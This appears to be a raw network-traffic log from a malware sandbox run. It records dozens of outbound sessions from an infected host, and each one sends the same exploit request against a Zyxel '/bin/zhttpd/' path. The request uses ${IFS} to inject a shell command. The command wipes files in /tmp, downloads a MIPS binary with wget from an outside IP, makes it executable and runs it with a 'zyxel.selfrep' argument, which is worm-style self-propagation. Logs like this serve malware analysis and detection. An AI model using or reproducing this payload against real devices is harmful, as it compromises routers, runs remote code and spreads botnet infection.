                                                Jan 12, 2024 18:16:11.171780109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1558192.168.2.236056036.21.217.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171814919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1559192.168.2.2333888147.153.114.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171838045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1560192.168.2.2356436141.158.73.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171890020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1561192.168.2.23455181.167.136.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171941042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1562192.168.2.2359068183.252.151.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.171983004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1563192.168.2.2342748184.72.38.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.172019958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1564192.168.2.2354436205.102.179.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:11.172054052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1565192.168.2.2334338194.27.105.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184206009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1566192.168.2.235094460.192.49.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184242964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1567192.168.2.2334048216.107.253.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184277058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1568192.168.2.2348816168.121.238.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184334040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1569192.168.2.2356558208.254.98.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184375048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1570192.168.2.2348984146.229.110.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184416056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1571192.168.2.2359904211.117.128.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184480906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1572192.168.2.2347282178.140.200.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184535980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1573192.168.2.235457049.240.155.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184586048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1574192.168.2.234345881.147.8.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184617996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1575192.168.2.2348480139.80.165.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184643984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1576192.168.2.234552691.171.141.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184684038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1577192.168.2.2355886191.109.125.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184737921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1578192.168.2.2350746203.82.152.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184762001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1579192.168.2.2355658169.141.200.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184801102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1580192.168.2.235494477.66.31.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184844017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1581192.168.2.2358206123.19.223.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184885979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1582192.168.2.2343648161.7.6.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184916973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1583192.168.2.2344372178.46.94.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184951067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1584192.168.2.2352422162.169.221.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.184998035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1585192.168.2.234642266.244.157.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185034990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1586192.168.2.233714453.248.170.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185070992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1587192.168.2.2350200163.128.109.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185097933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1588192.168.2.2344954173.44.214.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185131073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1589192.168.2.235318675.28.190.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185168028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1590192.168.2.2351298105.245.253.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185214043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1591192.168.2.2354088137.193.52.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185239077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1592192.168.2.2346074102.14.92.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185273886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1593192.168.2.2355450212.162.55.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185307980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1594192.168.2.2354904123.151.50.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185354948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1595192.168.2.2341892202.203.170.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185395002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1596192.168.2.235257212.69.250.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185440063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1597192.168.2.2347492160.8.204.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185482025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1598192.168.2.233540897.147.152.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185520887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1599192.168.2.234711876.228.19.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185534000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1600192.168.2.233651478.65.251.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185585976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1601192.168.2.2360342177.217.190.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185610056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1602192.168.2.235675623.255.178.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185641050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1603192.168.2.234992288.206.161.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185689926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1604192.168.2.2338536165.189.251.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185725927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1605192.168.2.235175698.93.254.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185806990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1606192.168.2.2342462128.191.105.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185822010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1607192.168.2.2339898170.138.87.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185870886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1608192.168.2.2356988178.253.48.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185899973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1609192.168.2.2333732209.200.46.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185930967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1610192.168.2.234369294.242.185.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.185992956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1611192.168.2.2337238101.60.164.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186027050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1612192.168.2.2336118107.64.114.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186057091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1613192.168.2.2357236158.56.87.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186093092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1614192.168.2.235170667.204.41.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186146021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1615192.168.2.2341232142.158.14.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186187983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1616192.168.2.2338924203.241.151.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186239958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1617192.168.2.235633414.7.69.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186278105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1618192.168.2.233350294.176.99.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186291933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1619192.168.2.235191861.2.80.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:12.186332941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1620192.168.2.2348552113.133.11.1443
                                                TimestampBytes transferredDirectionData
